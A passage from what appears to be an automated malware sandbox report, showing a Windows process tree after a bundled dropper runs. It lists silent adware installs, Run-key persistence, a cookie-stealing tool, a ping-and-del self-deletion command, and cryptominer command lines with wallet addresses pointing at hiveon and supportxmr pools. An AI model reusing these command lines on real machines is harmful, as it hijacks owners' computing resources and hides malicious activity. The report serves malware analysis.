                                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1436,2591049530503875785,14340026033627662857,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=5992 /prefetch:8
                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                            PID:6484
                                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1436,2591049530503875785,14340026033627662857,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=5880 /prefetch:8
                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                              PID:5856
                                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1436,2591049530503875785,14340026033627662857,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=6112 /prefetch:8
                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                PID:6636
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\SwReporter\89.259.200\software_reporter_tool.exe
                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\SwReporter\89.259.200\software_reporter_tool.exe" --engine=2 --scan-locations=1,2,3,4,5,6,7,8,10 --disabled-locations=9,11 --session-id=H+fPqUojgMEqlg5xo5DXtlBchKWHTkCptV0oKP27 --registry-suffix=ESET --srt-field-trial-group-name=NewCleanerUIExperiment
                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                PID:2104
                                                                                                                                                                                                                • \??\c:\users\admin\appdata\local\temp\cghjgasaaz99\swreporter\89.259.200\software_reporter_tool.exe
                                                                                                                                                                                                                  c:\users\admin\appdata\local\temp\cghjgasaaz99\swreporter\89.259.200\software_reporter_tool.exe --crash-handler "--database=c:\users\admin\appdata\local\Google\Software Reporter Tool" --url=https://clients2.google.com/cr/report --annotation=plat=Win32 --annotation=prod=ChromeFoil --annotation=ver=89.259.200 --initial-client-data=0x244,0x248,0x24c,0x220,0x250,0x7ff7a3f7ac28,0x7ff7a3f7ac38,0x7ff7a3f7ac48
                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                  PID:4480
                                                                                                                                                                                                                • \??\c:\users\admin\appdata\local\temp\cghjgasaaz99\swreporter\89.259.200\software_reporter_tool.exe
                                                                                                                                                                                                                  "c:\users\admin\appdata\local\temp\cghjgasaaz99\swreporter\89.259.200\software_reporter_tool.exe" --use-crash-handler-with-id="\\.\pipe\crashpad_2104_DEGAORPBXZOLWDXY" --sandboxed-process-id=2 --init-done-notifier=716 --sandbox-mojo-pipe-token=1497895173343420881 --mojo-platform-channel-handle=684 --engine=2
                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                  PID:5708
                                                                                                                                                                                                                • \??\c:\users\admin\appdata\local\temp\cghjgasaaz99\swreporter\89.259.200\software_reporter_tool.exe
                                                                                                                                                                                                                  "c:\users\admin\appdata\local\temp\cghjgasaaz99\swreporter\89.259.200\software_reporter_tool.exe" --use-crash-handler-with-id="\\.\pipe\crashpad_2104_DEGAORPBXZOLWDXY" --sandboxed-process-id=3 --init-done-notifier=916 --sandbox-mojo-pipe-token=17658482960456456247 --mojo-platform-channel-handle=912
                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                  PID:6176
                                                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1436,2591049530503875785,14340026033627662857,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=3892 /prefetch:8
                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                  PID:6688
                                                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1436,2591049530503875785,14340026033627662857,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=748 /prefetch:8
                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                    PID:6812
                                                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1436,2591049530503875785,14340026033627662857,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=4840 /prefetch:8
                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                      PID:6784
                                                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1436,2591049530503875785,14340026033627662857,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2920 /prefetch:8
                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                        PID:5088
                                                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1436,2591049530503875785,14340026033627662857,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2928 /prefetch:8
                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                          PID:6848
                                                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1436,2591049530503875785,14340026033627662857,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2796 /prefetch:8
                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                            PID:5676
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe
                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe"
                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                        PID:2244
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-OQ57D.tmp\Install.tmp
                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-OQ57D.tmp\Install.tmp" /SL5="$B0286,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe"
                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                          PID:2832
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-86JBA.tmp\Ultra.exe
                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-86JBA.tmp\Ultra.exe" /S /UID=burnerch1
                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                            • Drops file in Drivers directory
                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                            • Adds Run key to start application
                                                                                                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                                                                                                            PID:4748
                                                                                                                                                                                                                            • C:\Program Files\Windows Portable Devices\XWIZCURLMR\ultramediaburner.exe
                                                                                                                                                                                                                              "C:\Program Files\Windows Portable Devices\XWIZCURLMR\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                              PID:4660
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-V1DHS.tmp\ultramediaburner.tmp
                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-V1DHS.tmp\ultramediaburner.tmp" /SL5="$20292,281924,62464,C:\Program Files\Windows Portable Devices\XWIZCURLMR\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                PID:4200
                                                                                                                                                                                                                                • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                                                                                                                  "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                  PID:4596
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\39-ebebe-33e-07eb0-3f96181b58f9d\Bedofufomae.exe
                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\39-ebebe-33e-07eb0-3f96181b58f9d\Bedofufomae.exe"
                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                              • Checks computer location settings
                                                                                                                                                                                                                              PID:4224
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX2\filee.exe
                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX2\filee.exe"
                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                        PID:5168
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\B7E7.tmp.exe
                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\B7E7.tmp.exe"
                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                                                                          PID:5724
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\B7E7.tmp.exe
                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\B7E7.tmp.exe"
                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                              PID:5468
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\BAC6.tmp.exe
                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\BAC6.tmp.exe"
                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                            • Adds Run key to start application
                                                                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                                                                            PID:5840
                                                                                                                                                                                                                            • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                              -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w25019@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                PID:6068
                                                                                                                                                                                                                              • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w9028 --cpu-max-threads-hint 50 -r 9999
                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                • Blocklisted process makes network request
                                                                                                                                                                                                                                PID:1280
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\filee.exe"
                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                PID:5736
                                                                                                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                  PID:5468
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                  ping 127.0.0.1
                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                  • Runs ping.exe
                                                                                                                                                                                                                                  PID:5656
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX2\jg6_6asg.exe
                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\RarSFX2\jg6_6asg.exe"
                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                              • Checks whether UAC is enabled
                                                                                                                                                                                                                              PID:5644
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX2\kabo.exe
                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\RarSFX2\kabo.exe"
                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                                                              PID:6036
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX2\kabo.exe
                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX2\kabo.exe"
                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                PID:5940
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX2\IrecCH6.exe
                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\RarSFX2\IrecCH6.exe"
                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                              PID:4644
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-N6N4J.tmp\IrecCH6.tmp
                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-N6N4J.tmp\IrecCH6.tmp" /SL5="$70438,234767,151040,C:\Users\Admin\AppData\Local\Temp\RarSFX2\IrecCH6.exe"
                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                PID:5452
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-3PB7P.tmp\player_record_48792.exe
                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-3PB7P.tmp\player_record_48792.exe" /S /UID=irecch6
                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                  • Drops file in Drivers directory
                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                  • Adds Run key to start application
                                                                                                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                                                                                                  PID:5852
                                                                                                                                                                                                                                  • C:\Program Files\Windows Portable Devices\RTXNOGSPYS\irecord.exe
                                                                                                                                                                                                                                    "C:\Program Files\Windows Portable Devices\RTXNOGSPYS\irecord.exe" /VERYSILENT
                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                    PID:5972
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-U38N9.tmp\irecord.tmp
                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-U38N9.tmp\irecord.tmp" /SL5="$1701EE,6139911,56832,C:\Program Files\Windows Portable Devices\RTXNOGSPYS\irecord.exe" /VERYSILENT
                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                      PID:6056
                                                                                                                                                                                                                                      • C:\Program Files (x86)\recording\i-record.exe
                                                                                                                                                                                                                                        "C:\Program Files (x86)\recording\i-record.exe" -silent -desktopShortcut -programMenu
                                                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                        PID:1312
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\9c-18392-259-85fb0-96d1eb9ff19ef\Wodarihaeqy.exe
                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\9c-18392-259-85fb0-96d1eb9ff19ef\Wodarihaeqy.exe"
                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                    • Checks computer location settings
                                                                                                                                                                                                                                    PID:6096
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\b0-6b4c9-328-1cd83-24864693c6e71\Qitydaebushy.exe
                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\b0-6b4c9-328-1cd83-24864693c6e71\Qitydaebushy.exe"
                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                    PID:1496
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe
                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"
                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                              • Adds Run key to start application
                                                                                                                                                                                                                              PID:5548
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                PID:3856
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                PID:6228
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                PID:6892
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                PID:1872
                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                                                        • Modifies Internet Explorer settings
                                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                        PID:5436
                                                                                                                                                                                                                      • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                        C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                        • Modifies Internet Explorer settings
                                                                                                                                                                                                                        PID:5484
                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                        PID:5700
                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                        • Modifies Internet Explorer settings
                                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                                        PID:5784
                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                        PID:4496
                                                                                                                                                                                                                      • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                        C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                        • Modifies Internet Explorer settings
                                                                                                                                                                                                                        PID:5096
                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                        PID:4784
                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                                        PID:5632
                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                          PID:5216
                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                          PID:5300
                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                          PID:6376
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\83F1.exe
                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\83F1.exe
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                          PID:6508
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\86FF.exe
                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\86FF.exe
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                          PID:6560
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                            PID:6596
                                                                                                                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                                                                                                                            C:\Windows\explorer.exe
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                              PID:6636
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                PID:6652
                                                                                                                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                                                                                                                C:\Windows\explorer.exe
                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                PID:6676
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                  PID:6736
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                    PID:6760
                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                                    PID:6996
                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                                    PID:6660
                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                                    PID:6232
                                                                                                                                                                                                                                  • C:\Windows\system32\werfault.exe
                                                                                                                                                                                                                                    werfault.exe /h /shared Global\6b1c4b1706a64700a39c2df572c3c105 /t 5728 /p 6996
                                                                                                                                                                                                                                    1⤵
